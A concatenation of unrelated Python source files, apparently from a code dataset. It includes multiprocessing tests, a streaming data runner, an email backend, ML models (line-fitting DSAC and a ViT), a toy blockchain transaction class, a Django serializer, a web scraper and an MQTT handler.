with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
# remove unrelated MacOS warning messages first
warnings.filterwarnings(
"ignore", message='semaphore are broken on OSX')
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the resource_tracker
del sem
gc.collect()
assert wr() is None
if should_die:
assert len(all_warn) == 1
the_warn = all_warn[0]
assert issubclass(the_warn.category, UserWarning)
assert "resource_tracker: process died" in str(
the_warn.message)
else:
assert len(all_warn) == 0
@pytest.mark.skipif(sys.platform == "win32",
reason="Limited signal support on Windows")
def test_resource_tracker_sigint(self):
# Catchable signal (ignored by resource tracker)
self.check_resource_tracker_death(signal.SIGINT, False)
@pytest.mark.skipif(sys.platform == "win32",
reason="Limited signal support on Windows")
def test_resource_tracker_sigterm(self):
# Catchable signal (ignored by resource tracker)
self.check_resource_tracker_death(signal.SIGTERM, False)
@pytest.mark.skipif(sys.platform == "win32",
reason="Limited signal support on Windows")
def test_resource_tracker_sigkill(self):
# Uncatchable signal.
self.check_resource_tracker_death(signal.SIGKILL, True)
@pytest.mark.skipif(sys.version_info < (3, 8),
reason="SharedMemory introduced in Python 3.8")
def test_loky_process_inherit_multiprocessing_resource_tracker(self):
cmd = '''if 1:
from loky import get_reusable_executor
from multiprocessing.shared_memory import SharedMemory
from multiprocessing.resource_tracker import (
_resource_tracker as mp_resource_tracker
)
def mp_rtracker_getattrs():
from multiprocessing.resource_tracker import (
_resource_tracker as mp_resource_tracker
)
return mp_resource_tracker._fd, mp_resource_tracker._pid
if __name__ == '__main__':
executor = get_reusable_executor(max_workers=1)
# warm up
f = executor.submit(id, 1).result()
# loky forces the creation of the resource tracker at process
# creation so that loky processes can inherit its file descriptor.
fd, pid = executor.submit(mp_rtracker_getattrs).result()
assert fd == mp_resource_tracker._fd
assert pid == mp_resource_tracker._pid
# non-regression test for #242: unlinking in a loky process a
# shared_memory segment tracked by multiprocessing and created its
# parent should not generate warnings.
shm = SharedMemory(create=True, size=10)
f = executor.submit(shm.unlink).result()
'''
p = subprocess.run([sys.executable, '-c', cmd],
capture_output=True, text=True)
assert not p.stdout
assert not p.stderr
|
nilq/baby-python
|
python
|
from abc import ABC, abstractmethod
from datetime import datetime
from typing import List, Optional, Tuple, Any, Dict, Iterable, Generator
import yaml
from smart_open import smart_open
from blurr.core import logging
from blurr.core.aggregate_block import BlockAggregate, TimeAggregate
from blurr.core.errors import PrepareWindowMissingBlocksError
from blurr.core.evaluation import Context
from blurr.core.record import Record
from blurr.core.schema_loader import SchemaLoader
from blurr.core.store import Store
from blurr.core.store_key import Key
from blurr.core.transformer_streaming import StreamingTransformer, StreamingTransformerSchema
from blurr.core.transformer_window import WindowTransformer
from blurr.core.type import Type
from blurr.runner.data_processor import DataProcessor
TimeAndRecord = Tuple[datetime, Record]
class Runner(ABC):
"""
An abstract class that provides functionality to:
- Convert raw events in Records
- Process a list of Records for a user.
A class that inherits from Runner should do the following:
1. Call `get_per_identity_records()` using an iterator of the events available. This returns
a generator which creates a Tuple[Identity, TimeAndRecord]] output.
2. The Tuple[Identity, TimeAndRecord]] output should be grouped together by the
Identity to create a List of TimeAndRecord per identity.
3. Using the per identity list of TimeAndRecord `execute_per_identity_records()`
should be called.
- This returns Tuple[Identity, Tuple[Streaming BTS State, List of Window BTS output]].
- `execute_per_identity_records()` can take in a existing old_state (old Streaming BTS
State) so as to allow batch execution to make use of previous output.
"""
def __init__(self, stream_bts_file: str, window_bts_file: Optional[str]):
self._stream_bts = yaml.safe_load(smart_open(stream_bts_file))
self._window_bts = None if window_bts_file is None else yaml.safe_load(
smart_open(window_bts_file))
# TODO: Assume validation will be done separately.
# This causes a problem when running the code on spark
# as the validation yml file is inside the archived package
# and yamale is not able to read that.
# validate_schema_spec(self._stream_bts)
# if self._window_bts is not None:
# validate_schema_spec(self._window_bts)
def execute_per_identity_records(
self,
identity: str,
records: List[TimeAndRecord],
old_state: Optional[Dict[Key, Any]] = None) -> Tuple[str, Tuple[Dict, List]]:
"""
Executes the streaming and window BTS on the given records. An option old state can provided
which initializes the state for execution. This is useful for batch execution where the
previous state is written out to storage and can be loaded for the next batch run.
:param identity: Identity of the records.
:param records: List of TimeAndRecord to be processed.
:param old_state: Streaming BTS state dictionary from a previous execution.
:return: Tuple[Identity, Tuple[Identity, Tuple[Streaming BTS state dictionary,
List of window BTS output]].
"""
schema_loader = SchemaLoader()
if records:
records.sort(key=lambda x: x[0])
else:
records = []
block_data = self._execute_stream_bts(records, identity, schema_loader, old_state)
window_data = self._execute_window_bts(identity, schema_loader)
return identity, (block_data, window_data)
def get_per_identity_records(self, events: Iterable, data_processor: DataProcessor
) -> Generator[Tuple[str, TimeAndRecord], None, None]:
"""
Uses the given iteratable events and the data processor convert the event into a list of
Records along with its identity and time.
:param events: iteratable events.
:param data_processor: DataProcessor to process each event in events.
:return: yields Tuple[Identity, TimeAndRecord] for all Records in events,
"""
schema_loader = SchemaLoader()
stream_bts_name = schema_loader.add_schema_spec(self._stream_bts)
stream_transformer_schema: StreamingTransformerSchema = schema_loader.get_schema_object(
stream_bts_name)
for event in events:
try:
for record in data_processor.process_data(event):
try:
id = stream_transformer_schema.get_identity(record)
time = stream_transformer_schema.get_time(record)
yield (id, (time, record))
except Exception as err:
logging.error('{} in parsing Record {}.'.format(err, record))
except Exception as err:
logging.error('{} in parsing Event {}.'.format(err, event))
def _execute_stream_bts(self,
identity_events: List[TimeAndRecord],
identity: str,
schema_loader: SchemaLoader,
old_state: Optional[Dict] = None) -> Dict[Key, Any]:
if self._stream_bts is None:
return {}
stream_bts_name = schema_loader.add_schema_spec(self._stream_bts)
stream_transformer_schema = schema_loader.get_schema_object(stream_bts_name)
store = self._get_store(schema_loader)
if old_state:
for k, v in old_state.items():
store.save(k, v)
if identity_events:
stream_transformer = StreamingTransformer(stream_transformer_schema, identity)
for time, event in identity_events:
stream_transformer.run_evaluate(event)
stream_transformer.run_finalize()
return self._get_store(schema_loader).get_all(identity)
def _execute_window_bts(self, identity: str, schema_loader: SchemaLoader) -> List[Dict]:
if self._window_bts is None:
logging.debug('Window BTS not provided')
return []
stream_transformer = StreamingTransformer(
self._get_streaming_transformer_schema(schema_loader), identity)
all_data = self._get_store(schema_loader).get_all(identity)
stream_transformer.run_restore(all_data)
exec_context = Context()
exec_context.add(stream_transformer._schema.name, stream_transformer)
block_obj = None
for aggregate in stream_transformer._nested_items.values():
if not isinstance(aggregate, TimeAggregate):
continue
if block_obj is not None:
raise Exception(('Window operation is supported against Streaming ',
'BTS with only one BlockAggregate'))
block_obj = aggregate
if block_obj is None:
raise Exception('No BlockAggregate found in the Streaming BTS file')
window_data = []
window_bts_name = schema_loader.add_schema_spec(self._window_bts)
window_transformer_schema = schema_loader.get_schema_object(window_bts_name)
window_transformer = WindowTransformer(window_transformer_schema, identity, exec_context)
logging.debug('Running Window BTS for identity {}'.format(identity))
anchors = 0
blocks = 0
for key, data in all_data.items():
if key.group != block_obj._schema.name:
continue
try:
blocks += 1
if window_transformer.run_evaluate(block_obj.run_restore(data)):
anchors += 1
window_data.append(window_transformer.run_flattened_snapshot)
except PrepareWindowMissingBlocksError as err:
logging.debug('{} with {}'.format(err, key))
if anchors == 0:
logging.debug('No anchors found for identity {} out of {} blocks'.format(
identity, blocks))
return window_data
@staticmethod
def _get_store(schema_loader: SchemaLoader) -> Store:
stores = schema_loader.get_all_stores()
if not stores:
fq_name_and_schema = schema_loader.get_schema_specs_of_type(
Type.BLURR_STORE_DYNAMO, Type.BLURR_STORE_MEMORY)
return schema_loader.get_store(next(iter(fq_name_and_schema)))
return stores[0]
@staticmethod
def _get_streaming_transformer_schema(
schema_loader: SchemaLoader) -> StreamingTransformerSchema:
fq_name_and_schema = schema_loader.get_schema_specs_of_type(Type.BLURR_TRANSFORM_STREAMING)
return schema_loader.get_schema_object(next(iter(fq_name_and_schema)))
@abstractmethod
def execute(self, *args, **kwargs):
NotImplemented('execute must be implemented')
@abstractmethod
def write_output_file(self, *args, **kwargs):
NotImplemented('execute must be implemented')
@abstractmethod
def print_output(self, *args, **kwargs):
NotImplemented('execute must be implemented')
|
nilq/baby-python
|
python
|
from .base_requests import AnymailRequestsBackend, RequestsPayload
from ..exceptions import AnymailRequestsAPIError
from ..message import AnymailRecipientStatus
from ..utils import get_anymail_setting
class EmailBackend(AnymailRequestsBackend):
"""
Postal v1 API Email Backend
"""
esp_name = "Postal"
def __init__(self, **kwargs):
"""Init options from Django settings"""
esp_name = self.esp_name
self.api_key = get_anymail_setting(
"api_key", esp_name=esp_name, kwargs=kwargs, allow_bare=True
)
# Required, as there is no hosted instance of Postal
api_url = get_anymail_setting("api_url", esp_name=esp_name, kwargs=kwargs)
if not api_url.endswith("/"):
api_url += "/"
super().__init__(api_url, **kwargs)
def build_message_payload(self, message, defaults):
return PostalPayload(message, defaults, self)
def parse_recipient_status(self, response, payload, message):
parsed_response = self.deserialize_json_response(response, payload, message)
if parsed_response["status"] != "success":
raise AnymailRequestsAPIError(
email_message=message, payload=payload, response=response, backend=self
)
# If we get here, the send call was successful.
messages = parsed_response["data"]["messages"]
return {
email: AnymailRecipientStatus(message_id=details["id"], status="queued")
for email, details in messages.items()
}
class PostalPayload(RequestsPayload):
def __init__(self, message, defaults, backend, *args, **kwargs):
http_headers = kwargs.pop("headers", {})
http_headers["X-Server-API-Key"] = backend.api_key
http_headers["Content-Type"] = "application/json"
http_headers["Accept"] = "application/json"
super().__init__(
message, defaults, backend, headers=http_headers, *args, **kwargs
)
def get_api_endpoint(self):
return "api/v1/send/message"
def init_payload(self):
self.data = {}
def serialize_data(self):
return self.serialize_json(self.data)
def set_from_email(self, email):
self.data["from"] = str(email)
def set_subject(self, subject):
self.data["subject"] = subject
def set_to(self, emails):
self.data["to"] = [str(email) for email in emails]
def set_cc(self, emails):
self.data["cc"] = [str(email) for email in emails]
def set_bcc(self, emails):
self.data["bcc"] = [str(email) for email in emails]
def set_reply_to(self, emails):
if len(emails) > 1:
self.unsupported_feature("multiple reply_to addresses")
if len(emails) > 0:
self.data["reply_to"] = str(emails[0])
def set_extra_headers(self, headers):
self.data["headers"] = headers
def set_text_body(self, body):
self.data["plain_body"] = body
def set_html_body(self, body):
if "html_body" in self.data:
self.unsupported_feature("multiple html parts")
self.data["html_body"] = body
def make_attachment(self, attachment):
"""Returns Postal attachment dict for attachment"""
att = {
"name": attachment.name or "",
"data": attachment.b64content,
"content_type": attachment.mimetype,
}
if attachment.inline:
# see https://github.com/postalhq/postal/issues/731
# but it might be possible with the send/raw endpoint
self.unsupported_feature('inline attachments')
return att
def set_attachments(self, attachments):
if attachments:
self.data["attachments"] = [
self.make_attachment(attachment) for attachment in attachments
]
def set_envelope_sender(self, email):
self.data["sender"] = str(email)
def set_tags(self, tags):
if len(tags) > 1:
self.unsupported_feature("multiple tags")
if len(tags) > 0:
self.data["tag"] = tags[0]
def set_esp_extra(self, extra):
self.data.update(extra)
|
nilq/baby-python
|
python
|
# encoding: utf-8
# module NationalInstruments.RFmx calls itself RFmx
# from NationalInstruments.RFmx.InstrMX.Fx40, Version=19.1.0.49152, Culture=neutral, PublicKeyToken=dc6ad606294fc298
# by generator 1.145
# no doc
# no imports
# no functions
# no classes
# variables with complex values
|
nilq/baby-python
|
python
|
from ..mime import GlueMimeListWidget, LAYERS_MIME_TYPE
class TestGlueMimeListWidget(object):
def setup_method(self, method):
self.w = GlueMimeListWidget()
def test_mime_type(self):
assert self.w.mimeTypes() == [LAYERS_MIME_TYPE]
def test_mime_data(self):
self.w.set_data(3, 'test data')
self.w.set_data(4, 'do not pick')
mime = self.w.mimeData([3])
mime.data(LAYERS_MIME_TYPE) == ['test data']
def test_mime_data_multiselect(self):
self.w.set_data(3, 'test data')
self.w.set_data(4, 'also pick')
mime = self.w.mimeData([3, 4])
mime.data(LAYERS_MIME_TYPE) == ['test data', 'also pick']
|
nilq/baby-python
|
python
|
# Generated by Django 2.0.5 on 2018-05-07 13:56
import django.contrib.postgres.fields
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Ticket',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('email', models.EmailField(max_length=254)),
('name', models.TextField()),
('kw', models.IntegerField()),
('year', models.IntegerField()),
('entry_date', models.TimeField(auto_now_add=True)),
('edited', models.TimeField(auto_now=True)),
('availability', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(choices=[('1', 'Monday'), ('2', 'Tuesday'), ('3', 'Wednesday'), ('4', 'Thursday'), ('5', 'Friday')], max_length=1), size=None)),
],
),
]
|
nilq/baby-python
|
python
|
import torch
import torch.nn.functional as F
import random
class NGDSAC:
'''
Neural-Guided DSAC to robustly fit lines.
'''
def __init__(self, hyps, inlier_thresh, inlier_beta, inlier_alpha, loss_function, invalid_loss):
'''
Constructor.
hyps -- number of line hypotheses sampled for each image
inlier_thresh -- threshold used in the soft inlier count, its measured in relative image size
inlier_beta -- scaling factor within the sigmoid of the soft inlier count
inlier_alpha -- scaling factor for the soft inlier scores (controls the peakiness of the hypothesis distribution)
loss_function -- function to compute the quality of estimated line parameters wrt ground truth
invalid_loss -- punishment when sampling invalid hypothesis
'''
self.hyps = hyps
self.inlier_thresh = inlier_thresh
self.inlier_beta = inlier_beta
self.inlier_alpha = inlier_alpha
self.loss_function = loss_function
self.invalid_loss = invalid_loss
def __sample_hyp(self, x, y, p, pool):
'''
Calculate a line hypothesis (slope, intercept) from two random points.
x -- vector of x values
y -- vector of y values
p -- sampling probabilities for selecting points
pool -- indicator vector updated with which points have been selected
'''
# select points
idx = torch.multinomial(p, 2, replacement = True)
idx1 = int(idx[0])
idx2 = int(idx[1])
# set indicators which points have been selected
pool[idx1] += 1
pool[idx2] += 1
# validity check, do not choose too close together
if torch.abs(x[idx1] - x[idx2]) < 0.05:
return 0, 0, False # no valid hypothesis found, indicated by False
# calculate line parameters
slope = (y[idx1] - y[idx2]) / (x[idx1] - x[idx2])
intercept = y[idx1] - slope * x[idx1]
return slope, intercept, True # True indicates a valid hypothesos
def __soft_inlier_count(self, slope, intercept, x, y):
'''
Soft inlier count for a given line and a given set of points.
slope -- slope of the line
intercept -- intercept of the line
x -- vector of x values
y -- vector of y values
'''
# point line distances
dists = torch.abs(slope * x - y + intercept)
dists = dists / torch.sqrt(slope * slope + 1)
# soft inliers
dists = 1 - torch.sigmoid(self.inlier_beta * (dists - self.inlier_thresh))
score = torch.sum(dists)
return score, dists
def __call__(self, prediction, log_probs, labels, xStart, xEnd, imh):
'''
Perform robust, differentiable line fitting according to NG-DSAC.
Returns the expected loss and hypothesis distribution entropy.
Expected loss can be used for backprob, entropy for monitoring / debugging.
prediction -- predicted 2D points for a batch of images, array of shape (Bx2xN) where
B is the number of images in the batch
2 is the number of point dimensions (y, x)
N is the number of predicted points
log_probs -- log of selection probabilities, array of shape (BxN)
labels -- ground truth labels for the batch, array of shape (Bx2) where
2 is the number of parameters (intercept, slope)
xStart -- x-values where each ground truth line starts (for calculating the loss), array of shape (B)
xEnd -- x-values where each ground truth line ends (for calculating the loss), array of shape (B)
imh -- relative height of the image (for calculating the loss), <= 1, array of shape (B)
'''
# faster on CPU because of many, small matrices
prediction = prediction.cpu()
batch_size = prediction.size(0)
avg_exp_loss = 0 # expected loss
avg_entropy = 0 # hypothesis distribution entropy
self.est_parameters = torch.zeros(batch_size, 2) # estimated lines (w/ max inliers)
self.batch_inliers = torch.zeros(batch_size, prediction.size(2)) # (soft) inliers for estimated lines
self.g_log_probs = torch.zeros(batch_size, prediction.size(2)) # gradient tensor for neural guidance
for b in range(0, batch_size):
hyp_losses = torch.zeros([self.hyps, 1]) # loss of each hypothesis
hyp_scores = torch.zeros([self.hyps, 1]) # score of each hypothesis
max_score = 0 # score of best hypothesis
y = prediction[b, 0] # all y-values of the prediction
x = prediction[b, 1] # all x.values of the prediction
p = torch.exp(log_probs[b]) # selection probabilities for points
for h in range(0, self.hyps):
# === step 1: sample hypothesis ===========================
slope, intercept, valid = self.__sample_hyp(x, y, p, self.g_log_probs[b])
if not valid:
hyp_losses[h] = self.invalid_loss
hyp_scores[h] = 0.0001
continue # skip other steps for invalid hyps
# === step 2: score hypothesis using soft inlier count ====
score, inliers = self.__soft_inlier_count(slope, intercept, x, y)
hyp = torch.zeros([2])
hyp[1] = slope
hyp[0] = intercept
# === step 3: calculate loss of hypothesis ================
loss = self.loss_function(hyp, labels[b], xStart[b], xEnd[b], imh[b])
# store results
hyp_losses[h] = loss
hyp_scores[h] = score
# keep track of best hypothesis so far
if score > max_score:
max_score = score
self.est_parameters[b] = hyp.detach()
self.batch_inliers[b] = inliers.detach()
# === step 4: calculate the expectation ===========================
#softmax distribution from hypotheses scores
hyp_scores = F.softmax(self.inlier_alpha * hyp_scores, 0)
# expectation of loss
avg_exp_loss += torch.sum(hyp_losses * hyp_scores)
return avg_exp_loss / batch_size
|
nilq/baby-python
|
python
|
import Signatures
class Tx:
inputs = None #input addreses
outputs = None #output addreses
sigs = None # signatures
reqd = None #required signatures that are not inputs
def __init__(self):
self.inputs = []
self.outputs = []
self.sigs = []
self.reqd = []
def add_input(self,from_addr, amount):
self.inputs.append((from_addr,amount))
def add_output(self,to_addr, amount):
self.outputs.append((to_addr,amount))
def add_reqd(self,addr):
self.reqd.append(addr)
def sign(self,private):
message = self.__gather()
newsig = Signatures.sign(message,private)
self.sigs.append(newsig)
def is_valid(self):
total_in = 0
total_out = 0
message = self.__gather()
for addr,amount in self.inputs:
found = False
for s in self.sigs:
if Signatures.verify(message,s,addr):
found = True
if not found:
return False
if amount < 0:
return False
total_in = total_in + amount
for addr in self.reqd:
found = False
for s in self.sigs:
if Signatures.verify(message,s,addr):
found = True
if not found:
return False
for addr, amount in self.outputs:
if amount <0:
return False
total_out = total_out + amount
# if total_out > total_in:
# return False
return True
def __gather(self):
data = []
data.append(self.inputs)
data.append(self.outputs)
data.append(self.reqd)
return data
def __repr__(self):
reprstr = "INPUTS:\n"
for addr, amount in self.inputs:
reprstr = reprstr + str(amount) + " from " + str(addr) + "\n"
reprstr = reprstr + "OUTPUTS:\n"
for addr, amount in self.outputs:
reprstr = reprstr + str(amount) + " to " + str(addr) + "\n"
reprstr = reprstr + "REQD:\n"
for r in self.reqd:
reprstr = reprstr + str(r) + "\n"
reprstr = reprstr + "SIGS:\n"
for s in self.sigs:
reprstr = reprstr + str(s) + "\n"
reprstr = reprstr + "END\n"
return reprstr
if __name__ == "__main__":
pr1,pu1 = Signatures.generate_keys()
pr2,pu2 = Signatures.generate_keys()
pr3,pu3 = Signatures.generate_keys()
pr4,pu4 = Signatures.generate_keys()
Tx1 = Tx()
Tx1.add_input(pu1,1)
Tx1.add_output(pu2,1)
Tx1.sign(pr1)
Tx2 = Tx()
Tx2.add_input(pu1,2)
Tx2.add_output(pu2,1)
Tx2.add_output(pu3,1)
Tx2.sign(pr1)
Tx3 = Tx()
Tx3.add_input(pu3,1.2)
Tx3.add_output(pu1,1.1)
Tx3.add_reqd(pu4)
Tx3.sign(pr3)
Tx3.sign(pr4)
for t in [Tx1,Tx2,Tx3]:
if t.is_valid():
print("Success! Tx is valid")
else:
print("Error! Tx is invalid")
#Wrong signatures
Tx4 = Tx()
Tx4.add_input(pu1,1)
Tx4.add_output(pu2,1)
Tx4.sign(pr2)
#Escrow TX not signed by arbiter
Tx5 = Tx()
Tx5.add_input(pu3,1.2)
Tx5.add_output(pu1,1.1)
Tx5.add_reqd(pu4)
Tx5.sign(pr3)
#Two input addrs, signed by one
Tx6 = Tx()
Tx6.add_input(pu3,1)
Tx6.add_input(pu4,0.1)
Tx6.add_output(pu1,1.1)
Tx6.sign(pr3)
#Outputs exceed inputs
Tx7 = Tx()
Tx7.add_input(pu4,1.2)
Tx7.add_output(pu1,1)
Tx7.add_output(pu2,2)
Tx7.sign(pr4)
#Negative Values
Tx8 = Tx()
Tx8.add_input(pu2,-1)
Tx8.add_output(pu1,-1)
Tx8.sign(pr2)
#Modified Tx
Tx9 = Tx()
Tx9.add_input(pu1,1)
Tx9.add_output(pu2,1)
Tx9.sign(pr1)
#outputs = [(pu2,1)]
#changed to outputs = [(pu3,1)]
Tx9.outputs[0]= (pu3,1)
for t in [Tx4,Tx5,Tx6,Tx7,Tx8,Tx9]:
if t.is_valid():
print("Error! Bad Tx is valid")
else:
print("Success! Bad Tx is invalid")
|
nilq/baby-python
|
python
|
from rest_framework import serializers
from rest_framework.fields import SerializerMethodField
from .models import content_choice, visibility_choice
from .models import Post as Post
from backend.settings import SITE_ADDRESS
from author.serializers import AuthorSerializer
from comment.serializers import ChoiceField, CommentSerializer
from django.http import JsonResponse
class PostsSerializer(serializers.ModelSerializer):
id = serializers.SerializerMethodField()
type = serializers.SerializerMethodField()
author = serializers.SerializerMethodField()
source = serializers.SerializerMethodField('get_source_id')
origin = serializers.SerializerMethodField('get_origin_id')
contentType = ChoiceField(choices=content_choice)
visibility = ChoiceField(choices=visibility_choice)
comments = serializers.SerializerMethodField()
count = serializers.SerializerMethodField()
class Meta:
model = Post
fields = ("type", "id", "author", "title",
"visibility","description","content", "contentType",
"source", "origin","count","categories","comments",
"unlisted","published")
def get_type(self, obj):
return "post"
def get_author(self, obj):
return AuthorSerializer(obj.author_id).data
def get_id(self, obj):
return f"{SITE_ADDRESS}author/{obj.author_id.pk}/posts/{obj.post_id}/"
def get_origin_id(self, obj):
if obj.origin:
return obj.origin
else:
return f"{SITE_ADDRESS}author/{obj.author_id.pk}/posts/{obj.post_id}/"
def get_source_id(self,obj):
if obj.source:
return obj.source
else:
return f"{SITE_ADDRESS}author/{obj.author_id.pk}/posts/{obj.post_id}/"
def get_comments(self,obj):
return f"{SITE_ADDRESS}author/{obj.author_id.pk}/posts/{obj.post_id}/comments/"
def get_count(slef,obj):
return Post.objects.get(pk=obj.post_id).post_comments.all().count()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import time
import requests
from bs4 import BeautifulSoup
session = requests.session()
session.headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0'
words = []
for page in range(1, 94+1):
if page == 1:
url = 'https://synonymonline.ru/%D0%A0'
else:
url = f'https://synonymonline.ru/%D0%A0?page={page}'
rs = session.get(url)
root = BeautifulSoup(rs.content, 'html.parser')
for a in root.select('ul.words-list > li > a'):
word = a.text.lower()
if word.startswith('ре') and word.endswith('р'):
words.append(word)
time.sleep(0.3)
print(words)
# ['реактор', 'реакционер', 'реальгар', 'реаниматор', 'ребризер', 'реверсер',
# 'реверсор', 'ревизор', 'револьвер', 'революционер', 'регар', 'регенератор',
# 'регистр', 'регистратор', 'регулятор', 'регур', 'ред-ривер', 'редактор',
# 'редуктор', 'реестр', 'режиссер', 'резервуар', 'резистер', 'резистивиметр',
# 'резистор', 'резонатор', 'резонер', 'резус-фактор', 'рейбер', 'рейбор',
# 'рейвер', 'рейдер', 'рейнджер', 'рейнир', 'рейсфедер', 'рейтар', 'рейтер',
# 'рейхсвер', 'рейхсканцлер', 'рекетер', 'рекетмейстер', 'реклаймер',
# 'реконструктор', 'рекордер', 'рекрутер', 'ректификатор', 'ректор', 'рекуператор',
# 'релаксатор', 'рельсотранспортер', 'реляксатор', 'ремер', 'ремитер', 'ремонтер',
# 'рентгенгенератор', 'рентгенгониометр', 'рентгенметр', 'рентгеноанализатор',
# 'рентгеногониометр', 'рентгенометр', 'рентгеноспектр', 'рентгеноспектрометр',
# 'рентгеностереометр', 'рентгенотелевизор', 'рентгенофотометр', 'реоанализатор',
# 'реолавер', 'реометр', 'реомонитор', 'реомюр', 'реопирометр', 'реорганизатор',
# 'репеллер', 'репер', 'репертуар', 'реперфоратор', 'репетир', 'репетитор',
# 'репитер', 'репитор', 'репортер', 'репрессор', 'репродуктор', 'репшнур',
# 'ресивер', 'рессивер', 'реставратор', 'ресторатор', 'ретардер', 'ретинопротектор',
# 'ретранслятор', 'ретровир', 'ретур', 'ретушер', 'рефлектомер', 'рефлектометр',
# 'рефлектор', 'реформатор', 'рефрактомер', 'рефрактометр', 'рефрактор',
# 'рефрижератор', 'рефулер', 'рецептор', 'решофер']
|
nilq/baby-python
|
python
|
import torch
import torch.nn as nn
from einops.layers.torch import Rearrange
# This model is modified from https://github.com/lucidrains/vit-pytorch
class ViT(nn.Module):
def __init__(self, image_size, patch_size, dim, transformer, num_classes, channels=3, joint=True):
super().__init__()
num_patches = (image_size // patch_size) ** 2
patch_dim = channels * patch_size ** 2
self.joint = joint
self.to_patch_embedding = nn.Sequential(
Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_size, p2 = patch_size),
nn.Linear(patch_dim, dim),
)
self.pos_embedding = nn.Parameter(torch.randn(1, num_patches, dim))
self.transformer = transformer
self.mlp_head = nn.Sequential(
nn.LayerNorm(dim),
nn.Linear(dim, num_classes)
)
def forward(self, img1, img2=None):
if not self.joint:
x1 = self.to_patch_embedding(img1)
b, n, _ = x1.shape
x1 += self.pos_embedding[:, :n]
x1 = self.transformer(x1)
x1 = x1.mean(dim=1)
return self.mlp_head(x1)
x1 = self.to_patch_embedding(img1)
x2 = self.to_patch_embedding(img2)
b, n, _ = x1.shape
x1 += self.pos_embedding[:, :n]
x2 += self.pos_embedding[:, :n]
x = torch.cat((x1, x2), dim=1)
x = self.transformer(x)
x = self.mlp_head(x)
if self.training:
return x.reshape(x.shape[0] * x.shape[1], -1)
else:
return x.mean(dim=1)
|
nilq/baby-python
|
python
|
import os
import signal
import asyncio
import datetime
import json
import logging
import edgefarm_application as ef
from schema_loader import schema_read
#
# Using the ads_producer/encoder, you can publish a message towards ADS
#
ads_producer = None
ads_encoder = None
async def temperature_handler(msg):
"""This is the handler function that gets registered for `simulation/temperature`.
The received data is a python dictionary.
msg['payload'] is the MQTT message as received from MQTT. Here, the payload is
a json message, so we convert the json to a python dictionary.
This example encodes the data it into an ADS_DATA avro message.
The payload in ADS_DATA is another AVRO message with a schema for a temperature sensor (see `schemas/temperature_data.avsc`)
The whole ADS_DATA message is then sent to ads-node module.
"""
org_payload = json.loads(msg["payload"])
print(f"{msg}: payload={org_payload}")
if org_payload["sensorname"] == "temperature":
print(org_payload)
# Generate an ADS payload with "temperature_data" schema
ads_payload = {
"meta": {"version": b"\x01\x00\x00"},
"data": {
"time": datetime.datetime.fromtimestamp(int(org_payload["timestamp"])),
"temp": float(org_payload["value"]),
},
}
# Send data to ads node module
await ads_producer.encode_and_send(ads_encoder, ads_payload)
else:
print(f"Received unknown payload: {org_payload}")
# List of mqtt topics and corresponding handlers
# Example:
# topics = {
# 'simulation/temperature': temp_handler,
# 'simulation/acceleration': accel_handler
# }
topics = {"environment/temperature": temperature_handler}
async def main():
global ads_producer, ads_encoder
loop = asyncio.get_event_loop()
# Initialize EdgeFarm SDK
if os.getenv("IOTEDGE_MODULEID") is not None:
await ef.application_module_init_from_environment(loop)
else:
print("Warning: Running example outside IOTEDGE environment")
await ef.application_module_init(loop, "", "", "")
ads_producer = ef.AdsProducer()
# Create an encoder for an application specific payload
payload_schema = schema_read(__file__, "temperature_data")
ads_encoder = ef.AdsEncoder(
payload_schema,
schema_name="temperature_data",
schema_version=(1, 0, 0),
tags={"monitor": "channel1"},
)
# Connect to EdgeFarm service module mqtt-bridge and register the MQTT subjects we want to receive
mqtt_client = ef.AlmMqttModuleClient()
for mqtt_topic, handler in topics.items():
print(f"Registering to '{mqtt_topic}'")
await mqtt_client.subscribe(mqtt_topic, handler)
#
# The following shuts down gracefully when SIGINT or SIGTERM is received
#
stop = {"stop": False}
def signal_handler():
stop["stop"] = True
for sig in ("SIGINT", "SIGTERM"):
loop.add_signal_handler(getattr(signal, sig), signal_handler)
while not stop["stop"]:
await asyncio.sleep(1)
print("Unsubscribing and shutting down...")
await mqtt_client.close()
await ef.application_module_term()
if __name__ == "__main__":
logging.basicConfig(
level=os.environ.get("LOGLEVEL", "INFO").upper(),
format="%(asctime)s %(name)-12s %(levelname)-8s %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
)
asyncio.run(main())
|
nilq/baby-python
|
python
|
import datetime
import unittest
import isce
from isceobj.Orbit.Orbit import StateVector
class StateVectorTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def testEqualCompare(self):
"""
Test that __cmp__ returns true when the times are the same, but the
positions and velocities are different.
"""
sv1 = StateVector()
time1 = datetime.datetime(year=2001,month=2,day=7,hour=12,minute=13,
second=4)
pos1 = [1.0,2.0,3.0]
vel1 = [0.6,0.6,0.6]
sv1.setTime(time1)
sv1.setPosition(pos1)
sv1.setVelocity(vel1)
sv2 = StateVector()
time2 = datetime.datetime(year=2001,month=2,day=7,hour=12,minute=13,
second=4)
pos2 = [2.0,3.0,4.0]
vel2 = [0.7,0.7,0.7]
sv2.setTime(time2)
sv2.setPosition(pos2)
sv2.setVelocity(vel2)
self.assertTrue(sv1 == sv2)
def testNotEqualCompare(self):
"""
Test that __cmp__ returns false when the times are different, but the
positions and velocities are the same.
"""
sv1 = StateVector()
time1 = datetime.datetime(year=2001,month=2,day=7,hour=12,minute=13,second=5)
pos1 = [1.0,2.0,3.0]
vel1 = [0.6,0.6,0.6]
sv1.setTime(time1)
sv1.setPosition(pos1)
sv1.setVelocity(vel1)
sv2 = StateVector()
time2 = datetime.datetime(year=2001,month=2,day=7,hour=12,minute=13,second=4)
pos2 = [1.0,2.0,3.0]
vel2 = [0.6,0.6,0.6]
sv2.setTime(time2)
sv2.setPosition(pos2)
sv2.setVelocity(vel2)
self.assertFalse(sv1 == sv2)
